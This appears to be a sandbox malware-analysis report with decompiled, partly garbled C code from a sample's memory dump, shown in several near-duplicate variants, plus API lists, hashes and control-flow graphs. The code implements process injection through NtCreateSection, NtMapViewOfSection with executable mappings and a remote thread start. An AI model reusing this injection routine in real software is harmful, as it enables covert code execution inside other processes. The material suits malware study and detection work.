                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t109 = _t202 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                                                									} else {
                                                										L55();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t128, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t92, _t157, _t188, _t228);
                                                			}








































                                                0x004015ee
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                                                • Instruction ID: 6c2b391f055ddb0142fb10ad77502f624f49f79eb41efd18acee614c01c4bb16
                                                • Opcode Fuzzy Hash: 801b548cec8a15623861cda356d4c2b563af3d476dac939860f63dcf050ff5b4
                                                • Instruction Fuzzy Hash: CF5109B4900245BFEF219F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 231 401602-40162b call 401274 240 401630-401635 231->240 241 40162d 231->241 243 401956-40195e 240->243 244 40163b-40164c 240->244 241->240 243->240 249 401963-4019b3 call 401274 243->249 247 401652-40167b 244->247 248 401954 244->248 247->248 257 401681-401698 NtDuplicateObject 247->257 248->249 257->248 259 40169e-4016c2 NtCreateSection 257->259 260 4016c4-4016e5 NtMapViewOfSection 259->260 261 40171e-401744 NtCreateSection 259->261 260->261 263 4016e7-401703 NtMapViewOfSection 260->263 261->248 264 40174a-40174e 261->264 263->261 266 401705-40171b 263->266 264->248 267 401754-401775 NtMapViewOfSection 264->267 266->261 267->248 269 40177b-401797 NtMapViewOfSection 267->269 269->248 272 40179d call 4017a2 269->272
                                                C-Code - Quality: 58%
                                                			E00401602(void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				void* _t204;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				asm("outsb");
                                                				_push(0x392);
                                                				_t205 = _t204 + 4;
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t202 + 8));
                                                				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                				_t188 = _t202 - 0x60;
                                                				 *_t188 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                                                				_t91 =  *_t188;
                                                				if(_t91 != 0) {
                                                					_t132 = _t202 - 0x30;
                                                					 *_t132 = _t91;
                                                					_t132[1] = 0;
                                                					_t188 = _t202 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                                                					 *_t188 = 0x18;
                                                					_push(_t202 - 0x30);
                                                					_push(_t188);
                                                					_push(0x40);
                                                					_push(_t202 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t202 - 8)) = 0;
                                                						_t99 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t190 = _t202 - 0x54;
                                                						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t202 - 0x50);
                                                							_t122 = _t202 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t202 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                									_t201 =  *(_t202 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                                                									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t202 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                						_t188 = _t202 - 0x58;
                                                						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                                                							 *_t46 =  *(_t202 - 0x50);
                                                							_t103 = _t202 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t202 - 0x40;
                                                								 *_t105 = 0;
                                                								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                                                								if(_t224 == 0) {
                                                									L21();
                                                									if(_t224 == 0 && _t224 != 0) {
                                                										asm("hlt");
                                                										_push(_t205);
                                                									}
                                                									_push(0x2ea6);
                                                									_t209 = _t205 + 4;
                                                									_t161 = 0x2260;
                                                									_t162 = _t161 << 5;
                                                									_t163 = _t162 + 0x2260;
                                                									asm("lodsb");
                                                									_t164 = _t163;
                                                									asm("loop 0xffffffc4");
                                                									_t165 = _t164 ^ 0xad610a21;
                                                									_t205 = _t209 - _t165;
                                                									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                                                									_t139 =  *(_t195 + 6) & 0x0000ffff;
                                                									_push(_t195);
                                                									_t166 = _t195;
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_t167 = _t166 + 0xf8;
                                                										__eflags = _t167;
                                                									} else {
                                                										_t167 = _t166 + 0x108;
                                                									}
                                                									_push(_t139);
                                                									_t140 =  *(_t167 + 0x10);
                                                									if(_t140 != 0) {
                                                										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                                                										_t205 = _t205 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t188);
                                                									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                                                									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                                                										_push(_t188);
                                                										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                                                										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                                                										__eflags = _t198;
                                                										while(1) {
                                                											__eflags =  *_t198;
                                                											if( *_t198 == 0) {
                                                												break;
                                                											}
                                                											_t180 =  *_t198;
                                                											_t198 = _t198 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t170;
                                                												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t188);
                                                										__eflags = 0;
                                                										_t109 = _t202 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t109, 0);
                                                									} else {
                                                										L54();
                                                										_pop(_t181);
                                                										_t182 = _t181 - 0x1892;
                                                										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                                                										L004012E3(_t128, _t228);
                                                										0x33(_t182 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t205;
                                                				_push(0x392);
                                                				_t157 = 0xf1;
                                                				return L00401274(_t92, _t157, _t188, _t228);
                                                			}








































                                                0x00401602
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                                                • Instruction ID: ddd3f8d359e1be272fa8e6b980a73181fe92d2cf62f6648a3517e1c41251e5f0
                                                • Opcode Fuzzy Hash: 96db63f7d77d4681a7c8b0b211a7f1c9fea7a796f5373a4cc62486394675adc4
                                                • Instruction Fuzzy Hash: 4C5108B4900245BBEF209F91CC48FEBBBB8EF85B00F140169FA11BA2A5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 275 401605-40162b call 401274 282 401630-401635 275->282 283 40162d 275->283 285 401956-40195e 282->285 286 40163b-40164c 282->286 283->282 285->282 291 401963-4019b3 call 401274 285->291 289 401652-40167b 286->289 290 401954 286->290 289->290 299 401681-401698 NtDuplicateObject 289->299 290->291 299->290 301 40169e-4016c2 NtCreateSection 299->301 302 4016c4-4016e5 NtMapViewOfSection 301->302 303 40171e-401744 NtCreateSection 301->303 302->303 305 4016e7-401703 NtMapViewOfSection 302->305 303->290 306 40174a-40174e 303->306 305->303 308 401705-40171b 305->308 306->290 309 401754-401775 NtMapViewOfSection 306->309 308->303 309->290 311 40177b-401797 NtMapViewOfSection 309->311 311->290 314 40179d call 4017a2 311->314
                                                C-Code - Quality: 58%
                                                			E00401605(void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t131;
                                                				signed int _t138;
                                                				int _t139;
                                                				void* _t156;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				void* _t165;
                                                				intOrPtr* _t166;
                                                				void* _t169;
                                                				intOrPtr _t179;
                                                				void* _t180;
                                                				void* _t181;
                                                				HANDLE* _t187;
                                                				HANDLE* _t189;
                                                				void* _t194;
                                                				intOrPtr* _t197;
                                                				void* _t200;
                                                				void* _t201;
                                                				intOrPtr* _t203;
                                                				void* _t207;
                                                				long _t222;
                                                
                                                				asm("scasb");
                                                				L00401274(_t85, 0xf1, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
                                                				_t187 = _t201 - 0x60;
                                                				 *_t187 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
                                                				_t91 =  *_t187;
                                                				if(_t91 != 0) {
                                                					_t131 = _t201 - 0x30;
                                                					 *_t131 = _t91;
                                                					_t131[1] = 0;
                                                					_t187 = _t201 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                                                					 *_t187 = 0x18;
                                                					_push(_t201 - 0x30);
                                                					_push(_t187);
                                                					_push(0x40);
                                                					_push(_t201 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t201 - 8)) = 0;
                                                						_t99 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t189 = _t201 - 0x54;
                                                						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t201 - 0x50);
                                                							_t122 = _t201 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t201 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                									_t200 =  *(_t201 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
                                                									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                						_t187 = _t201 - 0x58;
                                                						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
                                                							 *_t46 =  *(_t201 - 0x50);
                                                							_t103 = _t201 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t201 - 0x40;
                                                								 *_t105 = 0;
                                                								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
                                                								if(_t222 == 0) {
                                                									L19();
                                                									if(_t222 == 0 && _t222 != 0) {
                                                										asm("hlt");
                                                										_push(_t203);
                                                									}
                                                									_push(0x2ea6);
                                                									_t207 = _t203 + 4;
                                                									_t160 = 0x2260;
                                                									_t161 = _t160 << 5;
                                                									_t162 = _t161 + 0x2260;
                                                									asm("lodsb");
                                                									_t163 = _t162;
                                                									asm("loop 0xffffffc4");
                                                									_t164 = _t163 ^ 0xad610a21;
                                                									_t203 = _t207 - _t164;
                                                									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                									_t138 =  *(_t194 + 6) & 0x0000ffff;
                                                									_push(_t194);
                                                									_t165 = _t194;
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_t166 = _t165 + 0xf8;
                                                										__eflags = _t166;
                                                									} else {
                                                										_t166 = _t165 + 0x108;
                                                									}
                                                									_push(_t138);
                                                									_t139 =  *(_t166 + 0x10);
                                                									if(_t139 != 0) {
                                                										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
                                                										_t203 = _t203 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t187);
                                                									_t226 =  *((intOrPtr*)(_t201 - 0x34));
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_push(_t187);
                                                										_t169 = _t187[0xd] -  *(_t201 - 0x40);
                                                										_t197 = _t187[0x28] +  *(_t201 - 0x48);
                                                										__eflags = _t197;
                                                										while(1) {
                                                											__eflags =  *_t197;
                                                											if( *_t197 == 0) {
                                                												break;
                                                											}
                                                											_t179 =  *_t197;
                                                											_t197 = _t197 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t169;
                                                												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t187);
                                                										__eflags = 0;
                                                										_t109 = _t201 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
                                                									} else {
                                                										L52();
                                                										_pop(_t180);
                                                										_t181 = _t180 - 0x1892;
                                                										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
                                                										L004012E3(_t128, _t226);
                                                										0x33(_t181 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t203;
                                                				_push(0x392);
                                                				_t156 = 0xf1;
                                                				return L00401274(_t92, _t156, _t187, _t226);
                                                			}







































                                                0x00401605
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
